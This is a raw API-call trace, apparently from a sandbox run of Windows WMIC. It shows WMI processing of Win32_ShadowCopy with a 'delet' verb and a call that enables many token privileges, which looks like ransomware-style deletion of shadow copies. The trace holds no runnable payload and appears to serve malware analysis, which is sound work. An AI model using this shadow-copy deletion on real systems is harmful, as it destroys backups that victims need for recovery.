plUbound=0x69cf70 | out: plUbound=0x69cf70) returned 0x0 [0185.673] lstrlenW (lpString="CIMTYPE") returned 7 [0185.673] lstrlenW (lpString="In") returned 2 [0185.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0185.673] lstrlenW (lpString="read") returned 4 [0185.673] lstrlenW (lpString="In") returned 2 [0185.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0185.673] lstrlenW (lpString="write") returned 5 [0185.673] lstrlenW (lpString="In") returned 2 [0185.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0185.674] lstrlenW (lpString="In") returned 2 [0185.674] lstrlenW (lpString="In") returned 2 [0185.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0185.674] SafeArrayGetElement (in: psa=0xa3ab40, rgIndices=0x69cf84, pv=0x69cf88 | out: pv=0x69cf88) returned 0x0 [0185.674] malloc (_Size=0xc) returned 0x88ac58 [0185.674] malloc (_Size=0x4) returned 0x88b6c0 [0185.674] lstrlenW (lpString="true") returned 4 [0185.674] lstrlenW (lpString="True") returned 4 [0185.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0185.674] malloc (_Size=0xc) returned 0x88aa90 [0185.674] malloc (_Size=0x4) returned 0x88b6e0 [0185.674] malloc (_Size=0x24) returned 0x88b6f0 [0185.674] malloc (_Size=0x4) returned 0x88b720 [0185.674] free (_Block=0x88b6e0) [0185.674] IUnknown:Release (This=0xa4ad28) returned 0x1 [0185.674] free (_Block=0x88b6c0) [0185.674] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.674] malloc (_Size=0xc) returned 0x88aa30 [0185.674] malloc (_Size=0xc) returned 0x88aa48 [0185.674] malloc (_Size=0x24) returned 0x88b730 [0185.674] malloc (_Size=0x24) returned 0x88b820 [0185.674] malloc (_Size=0x4) returned 0x88b6c0 [0185.674] SysStringLen (param_1="Volume") returned 0x6 [0185.674] SysStringLen (param_1="Context") returned 0x7 [0185.674] SysStringLen (param_1="Context") returned 0x7 [0185.674] SysStringLen (param_1="Volume") returned 0x6 [0185.674] malloc (_Size=0x38) returned 0x88b850 [0185.674] malloc (_Size=0x24) returned 0x88b890 [0185.674] malloc (_Size=0x24) returned 0x88b8c0 [0185.674] malloc (_Size=0x4) returned 0x88b6e0 [0185.674] free (_Block=0x88b6c0) [0185.675] free (_Block=0x88b820) [0185.675] free (_Block=0x88b730) [0185.675] free (_Block=0x88b720) [0185.675] free (_Block=0x88b6f0) [0185.675] free (_Block=0x88b690) [0185.675] IUnknown:Release (This=0xa4a668) returned 0x1 [0185.675] SafeArrayGetElement (in: psa=0xa3adb0, rgIndices=0x69d144, pv=0x69d150 | out: pv=0x69d150) returned 0x0 [0185.675] malloc (_Size=0xc) returned 0x88aaa8 [0185.675] IWbemClassObject:Get (in: This=0xa4ab90, wszName="ParaId", lFlags=0, pVal=0x69d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa309d4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d090*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ShadowID", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.675] free (_Block=0x88aaa8) [0185.675] malloc (_Size=0xc) returned 0x88aaa8 [0185.675] IWbemClassObject:Get (in: This=0xa4ab90, wszName="Type", lFlags=0, pVal=0x69d048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa30b8c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d048*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.675] free (_Block=0x88aaa8) [0185.675] malloc (_Size=0xc) returned 0x88aaa8 [0185.675] IWbemClassObject:Get (in: This=0xa4ab90, wszName="Default", lFlags=0, pVal=0x69d060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69d060*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.675] free (_Block=0x88aaa8) [0185.675] malloc (_Size=0x24) returned 0x88b820 [0185.675] GetCurrentThreadId () returned 0x1838 [0185.675] ??0CHString@@QAE@XZ () returned 0x69cf9c [0185.675] malloc (_Size=0xc) returned 0x88aaa8 [0185.675] IWbemClassObject:Get (in: This=0xa4ab90, wszName="Qualifiers", lFlags=0, pVal=0x69cf1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf1c*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3aa20*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xa21af0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.675] free (_Block=0x88aaa8) [0185.675] SafeArrayGetLBound (in: psa=0xa3aa20, nDim=0x1, plLbound=0x69cf54 | out: plLbound=0x69cf54) returned 0x0 [0185.676] SafeArrayGetUBound (in: psa=0xa3aa20, nDim=0x1, plUbound=0x69cf50 | out: plUbound=0x69cf50) returned 0x0 [0185.676] SafeArrayGetElement (in: psa=0xa3aa20, rgIndices=0x69cf74, pv=0x69cf94 | out: pv=0x69cf94) returned 0x0 [0185.676] malloc (_Size=0xc) returned 0x88aaa8 [0185.676] IWbemClassObject:Get (in: This=0xa4ad28, wszName="Name", lFlags=0, pVal=0x69cf3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf3c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Out", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.676] free (_Block=0x88aaa8) [0185.676] malloc (_Size=0xc) returned 0x88aaa8 [0185.676] IWbemClassObject:Get (in: This=0xa4ad28, wszName="QualifierValue", lFlags=0, pVal=0x69cf2c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69cf2c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa3ab70*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xa21b20, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.676] free (_Block=0x88aaa8) [0185.676] SafeArrayGetLBound (in: psa=0xa3ab70, nDim=0x1, plLbound=0x69cf4c | out: plLbound=0x69cf4c) returned 0x0 [0185.676] SafeArrayGetUBound (in: psa=0xa3ab70, nDim=0x1, plUbound=0x69cf70 | out: plUbound=0x69cf70) returned 0x0 [0185.676] lstrlenW (lpString="CIMTYPE") returned 7 [0185.676] lstrlenW (lpString="Out") returned 3 [0185.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="CIMTYPE", cchCount2=7) returned 3 [0185.676] lstrlenW (lpString="read") returned 4 [0185.676] lstrlenW (lpString="Out") returned 3 [0185.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="read", cchCount2=4) returned 1 [0185.676] lstrlenW (lpString="write") returned 5 [0185.676] lstrlenW (lpString="Out") returned 3 [0185.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="write", cchCount2=5) returned 1 [0185.676] lstrlenW (lpString="In") returned 2 [0185.676] lstrlenW (lpString="Out") returned 3 [0185.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="In", cchCount2=2) returned 3 [0185.676] lstrlenW (lpString="Out") returned 3 [0185.676] lstrlenW (lpString="Out") returned 3 [0185.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="Out", cchCount2=3) returned 2 [0185.676] SafeArrayGetElement (in: psa=0xa3ab70, rgIndices=0x69cf84, pv=0x69cf88 | out: pv=0x69cf88) returned 0x0 [0185.676] malloc (_Size=0xc) returned 0x88aaa8 [0185.676] malloc (_Size=0x4) returned 0x88b690 [0185.676] lstrlenW (lpString="true") returned 4 [0185.676] lstrlenW (lpString="True") returned 4 [0185.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0185.677] malloc (_Size=0xc) returned 0x889680 [0185.677] malloc (_Size=0x4) returned 0x88b6a0 [0185.677] malloc (_Size=0x24) returned 0x88b6f0 [0185.677] malloc (_Size=0x4) returned 0x88b6b0 [0185.677] free (_Block=0x88b6a0) [0185.677] IUnknown:Release (This=0xa4ad28) returned 0x1 [0185.677] free (_Block=0x88b690) [0185.677] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0185.677] malloc (_Size=0xc) returned 0x88ba58 [0185.677] malloc (_Size=0xc) returned 0x88bba8 [0185.677] malloc (_Size=0x24) returned 0x88b720 [0185.677] malloc (_Size=0x24) returned 0x88b750 [0185.677] malloc (_Size=0x4) returned 0x88b6c0 [0185.677] SysStringLen (param_1="ShadowID") returned 0x8 [0185.677] SysStringLen (param_1="Context") returned 0x7 [0185.677] SysStringLen (param_1="ShadowID") returned 0x8 [0185.677] SysStringLen (param_1="Volume") returned 0x6 [0185.677] SysStringLen (param_1="Context") returned 0x7 [0185.677] SysStringLen (param_1="ShadowID") returned 0x8 [0185.677] malloc (_Size=0x38) returned 0x88bcf8 [0185.677] malloc (_Size=0x24) returned 0x88bd38 [0185.677] malloc (_Size=0x24) returned 0x88bd68 [0185.677] malloc (_Size=0x4) returned 0x88b690 [0185.677] free (_Block=0x88b6c0) [0185.677] free (_Block=0x88b750) [0185.677] free (_Block=0x88b720) [0185.677] free (_Block=0x88b6b0) [0185.677] free (_Block=0x88b6f0) [0185.677] free (_Block=0x88b820) [0185.677] IUnknown:Release (This=0xa4ab90) returned 0x1 [0185.677] malloc (_Size=0x38) returned 0x88b6f0 [0185.678] malloc (_Size=0x38) returned 0x88b730 [0185.678] malloc (_Size=0x24) returned 0x88b820 [0185.678] malloc (_Size=0x24) returned 0x88b6a0 [0185.678] malloc (_Size=0x4) returned 0x88b770 [0185.678] malloc (_Size=0x38) returned 0x88bd98 [0185.678] malloc (_Size=0x24) returned 0x88bdd8 [0185.678] malloc (_Size=0x24) returned 0x88be08 [0185.678] malloc (_Size=0x4) returned 0x88be38 [0185.678] malloc (_Size=0x38) returned 0x88be48 [0185.678] malloc (_Size=0x24) returned 0x88be88 [0185.678] malloc (_Size=0x24) returned 0x88c240 [0185.678] malloc (_Size=0x4) returned 0x88c2c0 [0185.678] malloc (_Size=0xc) returned 0x88ba70 [0185.678] malloc (_Size=0x38) returned 0x88c2d0 [0185.678] malloc (_Size=0x38) returned 0x88c310 [0185.678] malloc (_Size=0x24) returned 0x88c000 [0185.678] malloc (_Size=0x24) returned 0x88c150 [0185.678] malloc (_Size=0x4) returned 0x88c350 [0185.678] malloc (_Size=0x38) returned 0x88c360 [0185.678] malloc (_Size=0x24) returned 0x88c0f0 [0185.678] malloc (_Size=0x24) returned 0x88c090 [0185.678] malloc (_Size=0x4) returned 0x88c3a0 [0185.678] malloc (_Size=0x38) returned 0x88c3b0 [0185.678] malloc (_Size=0x24) returned 0x88c120 [0185.678] malloc (_Size=0x24) returned 0x88c180 [0185.678] malloc (_Size=0x4) returned 0x88c3f0 [0185.678] malloc (_Size=0x28) returned 0x88c060 [0185.678] malloc (_Size=0x38) returned 0x88c400 [0185.678] malloc (_Size=0x38) returned 0x88c440 [0185.678] malloc (_Size=0x24) returned 0x88c1b0 [0185.678] malloc (_Size=0x24) returned 0x88c1e0 [0185.678] malloc (_Size=0x4) returned 0x88c480 [0185.678] malloc (_Size=0x38) returned 0x88c490 [0185.678] malloc (_Size=0x24) returned 0x88c210 [0185.678] malloc (_Size=0x24) returned 0x88c270 [0185.679] malloc (_Size=0x4) returned 0x88c4d0 [0185.679] malloc (_Size=0x38) returned 0x88c4e0 [0185.679] malloc (_Size=0x24) returned 0x88bee0 [0185.679] malloc (_Size=0x24) returned 0x88bf10 [0185.679] malloc (_Size=0x4) returned 0x88c520 [0185.679] free (_Block=0x88c3f0) [0185.679] free (_Block=0x88c180) [0185.679] free (_Block=0x88c120) [0185.679] free (_Block=0x88c3b0) [0185.679] free (_Block=0x88c350) [0185.679] free (_Block=0x88c150) [0185.679] free (_Block=0x88c000) [0185.679] free (_Block=0x88c310) [0185.679] free (_Block=0x88c3a0) [0185.679] free (_Block=0x88c090) [0185.679] free (_Block=0x88c0f0) [0185.679] free (_Block=0x88c360) [0185.679] free (_Block=0x88c2d0) [0185.679] free (_Block=0x88c2c0) [0185.679] free (_Block=0x88c240) [0185.679] free (_Block=0x88be88) [0185.679] free (_Block=0x88be48) [0185.679] free (_Block=0x88b770) [0185.679] free (_Block=0x88b6a0) [0185.679] free (_Block=0x88b820) [0185.679] free (_Block=0x88b730) [0185.679] free (_Block=0x88be38) [0185.679] free (_Block=0x88be08) [0185.679] free (_Block=0x88bdd8) [0185.679] free (_Block=0x88bd98) [0185.679] free (_Block=0x88b6f0) [0185.679] free (_Block=0x88b6e0) [0185.679] free (_Block=0x88b8c0) [0185.679] free (_Block=0x88b890) [0185.679] free (_Block=0x88b850) [0185.679] free (_Block=0x88b690) [0185.679] free (_Block=0x88bd68) [0185.679] free (_Block=0x88bd38) [0185.679] free (_Block=0x88bcf8) [0185.680] free (_Block=0x88b6d0) [0185.680] free (_Block=0x88b7f0) [0185.680] free (_Block=0x88b7c0) [0185.680] free (_Block=0x88b780) [0185.680] free (_Block=0x88b650) [0185.680] IUnknown:Release (This=0xa3afa8) returned 0x1 [0185.680] IUnknown:Release (This=0xa47bf8) returned 0x0 [0185.681] free (_Block=0x88ace8) [0185.681] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0186.002] malloc (_Size=0x28) returned 0x88bf40 [0186.002] malloc (_Size=0x38) returned 0x88c818 [0186.002] malloc (_Size=0x38) returned 0x88cc58 [0186.002] malloc (_Size=0x24) returned 0x88c030 [0186.002] malloc (_Size=0x24) returned 0x88c120 [0186.002] malloc (_Size=0x4) returned 0x88c2c0 [0186.003] malloc (_Size=0x38) returned 0x88c8d8 [0186.003] malloc (_Size=0x24) returned 0x88c240 [0186.003] malloc (_Size=0x24) returned 0x88bf70 [0186.003] malloc (_Size=0x4) returned 0x88c2d0 [0186.003] malloc (_Size=0x38) returned 0x88ccd8 [0186.003] malloc (_Size=0x24) returned 0x88c090 [0186.003] malloc (_Size=0x24) returned 0x88bfa0 [0186.003] malloc (_Size=0x4) returned 0x88c2e0 [0186.003] lstrlenW (lpString="delet") returned 5 [0186.003] lstrlenW (lpString="Create") returned 6 [0186.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Create", cchCount1=6, lpString2="delet", cchCount2=5) returned 1 [0186.003] free (_Block=0x88c2e0) [0186.003] free (_Block=0x88bfa0) [0186.003] free (_Block=0x88c090) [0186.003] free (_Block=0x88ccd8) [0186.003] free (_Block=0x88c2c0) [0186.003] free (_Block=0x88c120) [0186.003] free (_Block=0x88c030) [0186.003] free (_Block=0x88cc58) [0186.003] free (_Block=0x88c2d0) [0186.003] free (_Block=0x88bf70) [0186.003] free (_Block=0x88c240) [0186.003] free (_Block=0x88c8d8) [0186.003] free (_Block=0x88c818) [0186.003] free (_Block=0x88bf40) [0186.003] free (_Block=0x88b620) [0186.003] free (_Block=0x88ad00) [0186.003] lstrlenW (lpString="delet") returned 5 [0186.003] malloc (_Size=0xc) returned 0x88ba88 [0186.003] lstrlenW (lpString="delet") returned 5 [0186.003] malloc (_Size=0x4) returned 0x88c2c0 [0186.003] malloc (_Size=0x4) returned 0x88c2d0 [0186.003] ??0CHString@@QAE@XZ () returned 0x69da24 [0186.003] ?Format@CHString@@QAAXPBGZZ () returned 0x88c2ec [0186.007] ?TrimLeft@CHString@@QAEXXZ () returned 0xe [0186.007] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x88c2e0 [0186.007] malloc (_Size=0xc) returned 0x88b9e0 [0186.007] wcstok (in: _String=" Where ID = '#'", _Delimiter="#", _Context=0x6490e836 | out: _String=" Where ID = '", _Context=0x6490e836) returned=" Where ID = '" [0186.008] wcstok (in: _String=0x0, _Delimiter="#", _Context=0x6490e836 | out: _String=0x0, _Context=0x6490e836) returned="'" [0186.008] wcstok (in: _String=0x0, _Delimiter="#", _Context=0x6490e836 | out: _String=0x0, _Context=0x6490e836) returned 0x0 [0186.008] wcstok (in: _String=" Where ID = 'delet'", _Delimiter=" ", _Context=0x6490e836 | out: _String=" Where", _Context=0x6490e836) returned="Where" [0186.008] lstrlenW (lpString="Where") returned 5 [0186.008] lstrlenW (lpString="FROM") returned 4 [0186.008] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FROM", cchCount1=4, lpString2="Where", cchCount2=5) returned 1 [0186.008] lstrlenW (lpString="Where") returned 5 [0186.008] lstrlenW (lpString="WHERE") returned 5 [0186.008] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="Where", cchCount2=5) returned 2 [0186.008] wcstok (in: _String=0x0, _Delimiter="", _Context=0x6490e836 | out: _String=0x0, _Context=0x6490e836) returned="ID = 'delet'" [0186.008] lstrlenW (lpString="ID = 'delet'") returned 12 [0186.008] malloc (_Size=0x1a) returned 0x88bcf8 [0186.008] lstrlenW (lpString="ID = 'delet'") returned 12 [0186.008] free (_Block=0x88b9e0) [0186.008] ??1CHString@@QAE@XZ () returned 0x1 [0186.008] free (_Block=0x88c2d0) [0186.008] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0186.008] malloc (_Size=0x3e) returned 0x88c2d0 [0186.008] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0186.008] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x6490e8d2 | out: _String="Select", _Context=0x6490e8d2) returned="Select" [0186.008] malloc (_Size=0xc) returned 0x88bbd8 [0186.008] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6490e8d2 | out: _String=0x0, _Context=0x6490e8d2) returned="*" [0186.008] lstrlenW (lpString="FROM") returned 4 [0186.008] lstrlenW (lpString="*") returned 1 [0186.008] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0186.008] malloc (_Size=0xc) returned 0x88b950 [0186.008] free (_Block=0x88bbd8) [0186.008] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6490e8d2 | out: _String=0x0, _Context=0x6490e8d2) returned="from" [0186.008] lstrlenW (lpString="FROM") returned 4 [0186.008] lstrlenW (lpString="from") returned 4 [0186.008] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0186.008] malloc (_Size=0xc) returned 0x88b998 [0186.009] free (_Block=0x88b950) [0186.009] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6490e8d2 | out: _String=0x0, _Context=0x6490e8d2) returned="Win32_ShadowCopy" [0186.009] malloc (_Size=0xc) returned 0x88b950 [0186.009] free (_Block=0x88b998) [0186.009] free (_Block=0x88c2d0) [0186.009] free (_Block=0x88b950) [0186.009] lstrlenW (lpString="SET") returned 3 [0186.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="SET", cchCount2=3) returned 0 [0186.009] lstrlenW (lpString="CREATE") returned 6 [0186.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="CREATE", cchCount2=6) returned 0 [0186.009] free (_Block=0x880598) [0186.009] malloc (_Size=0x4) returned 0x880598 [0186.009] lstrlenW (lpString="GET") returned 3 [0186.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="GET", cchCount2=3) returned 0 [0186.009] lstrlenW (lpString="LIST") returned 4 [0186.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="LIST", cchCount2=4) returned 0 [0186.009] lstrlenW (lpString="ASSOC") returned 5 [0186.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="ASSOC", cchCount2=5) returned 0 [0186.009] free (_Block=0x88a988) [0186.009] malloc (_Size=0xc) returned 0x88bb90 [0186.009] free (_Block=0x88a970) [0186.009] malloc (_Size=0xc) returned 0x88b9b0 [0186.009] ??0CHString@@QAE@XZ () returned 0x69fb70 [0186.009] malloc (_Size=0xc) returned 0x88baa0 [0186.009] memcpy_s (in: _Destination=0x69fac4, _DestinationSize=0xe, _Source=0xa3095c, _SourceSize=0xc | out: _Destination=0x69fac4) returned 0x0 [0186.009] lstrlenW (lpString="&") returned 1 [0186.010] lstrlenW (lpString="&") returned 5 [0186.010] lstrlenW (lpString="<") returned 1 [0186.010] lstrlenW (lpString="<") returned 4 [0186.010] lstrlenW (lpString=">") returned 1 [0186.010] lstrlenW (lpString=">") returned 4 [0186.010] lstrlenW (lpString="'") returned 1 [0186.010] lstrlenW (lpString="'") returned 6 [0186.010] lstrlenW (lpString="\"") returned 1 [0186.010] lstrlenW (lpString=""") returned 6 [0186.010] malloc (_Size=0xc) returned 0x88bbd8 [0186.010] free (_Block=0x88baa0) [0186.010] ?Format@CHString@@QAAXPBGZZ () returned 0x88bd2c [0186.010] malloc (_Size=0xc) returned 0x88bbc0 [0186.010] malloc (_Size=0xc) returned 0x88bbf0 [0186.010] SysStringLen (param_1="") returned 0x0 [0186.010] SysStringLen (param_1="") returned 0x17 [0186.010] free (_Block=0x88b9b0) [0186.010] free (_Block=0x88bbc0) [0186.010] free (_Block=0x88bbd8) [0186.010] ??1CHString@@QAE@XZ () returned 0x1 [0186.010] WbemLocator:IUnknown:AddRef (This=0x9f2e50) returned 0x3 [0186.010] free (_Block=0x882688) [0186.010] lstrlenW (lpString="") returned 0 [0186.010] lstrlenW (lpString="NQDPDE") returned 6 [0186.010] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0186.010] lstrlenW (lpString="NQDPDE") returned 6 [0186.011] malloc (_Size=0xe) returned 0x88b9f8 [0186.011] lstrlenW (lpString="NQDPDE") returned 6 [0186.011] GetCurrentThreadId () returned 0x1838 [0186.011] GetCurrentProcess () returned 0xffffffff [0186.011] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x69faa0 | out: TokenHandle=0x69faa0*=0x2f8) returned 1 [0186.011] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x69fa9c | out: TokenInformation=0x0, ReturnLength=0x69fa9c) returned 0 [0186.011] malloc (_Size=0x118) returned 0x88c2d0 [0186.011] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x88c2d0, TokenInformationLength=0x118, ReturnLength=0x69fa9c | out: TokenInformation=0x88c2d0, ReturnLength=0x69fa9c) returned 1 [0186.011] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x88c2d0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0186.011] free (_Block=0x88c2d0) [0186.011] CloseHandle (hObject=0x2f8) returned 1 [0186.011] lstrlenW (lpString="GET") returned 3 [0186.011] malloc (_Size=0x8) returned 0x882688 [0186.011] lstrlenW (lpString="GET") returned 3 [0186.011] malloc (_Size=0xc) returned 0x88b950 [0186.011] lstrlenA (lpString="") returned 0 [0186.011] malloc (_Size=0x2) returned 0x88c2d0 [0186.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe62b74, cbMultiByte=-1, lpWideCharStr=0x88c2d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0186.011] free (_Block=0x88c2d0) [0186.011] malloc (_Size=0xc) returned 0x88bbc0 [0186.011] lstrlenA (lpString="") returned 0 [0186.011] malloc (_Size=0x2) returned 0x88c2d0 [0186.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe62b74, cbMultiByte=-1, lpWideCharStr=0x88c2d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0186.011] free (_Block=0x88c2d0) [0186.011] malloc (_Size=0xc) returned 0x88bb78 [0186.011] lstrlenA (lpString="") returned 0 [0186.011] malloc (_Size=0x2) returned 0x88c2d0 [0186.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe62b74, cbMultiByte=-1, lpWideCharStr=0x88c2d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0186.012] free (_Block=0x88c2d0) [0186.012] malloc (_Size=0xc) returned 0x88bb30 [0186.012] lstrlenA (lpString="") returned 0 [0186.012] malloc (_Size=0x2) returned 0x88c2d0 [0186.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe62b74, cbMultiByte=-1, lpWideCharStr=0x88c2d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0186.012] free (_Block=0x88c2d0) [0186.012] free (_Block=0x88b950) [0186.012] malloc (_Size=0xc) returned 0x88baa0 [0186.012] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0186.012] malloc (_Size=0x3e) returned 0x88c2d0 [0186.012] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0186.012] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x6490a852 | out: _String="Select", _Context=0x6490a852) returned="Select" [0186.012] malloc (_Size=0xc) returned 0x88bae8 [0186.012] free (_Block=0x88bbc0) [0186.012] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6490a852 | out: _String=0x0, _Context=0x6490a852) returned="*" [0186.012] lstrlenW (lpString="FROM") returned 4 [0186.012] lstrlenW (lpString="*") returned 1 [0186.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0186.012] malloc (_Size=0xc) returned 0x88bb00 [0186.012] free (_Block=0x88bae8) [0186.012] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6490a852 | out: _String=0x0, _Context=0x6490a852) returned="from" [0186.012] lstrlenW (lpString="FROM") returned 4 [0186.012] lstrlenW (lpString="from") returned 4 [0186.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0186.012] malloc (_Size=0xc) returned 0x88b998 [0186.012] free (_Block=0x88bb00) [0186.012] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x6490a852 | out: _String=0x0, _Context=0x6490a852) returned="Win32_ShadowCopy" [0186.013] malloc (_Size=0xc) returned 0x88bab8 [0186.013] free (_Block=0x88b998) [0186.013] free (_Block=0x88c2d0) [0186.013] malloc (_Size=0xc) returned 0x88b998 [0186.013] 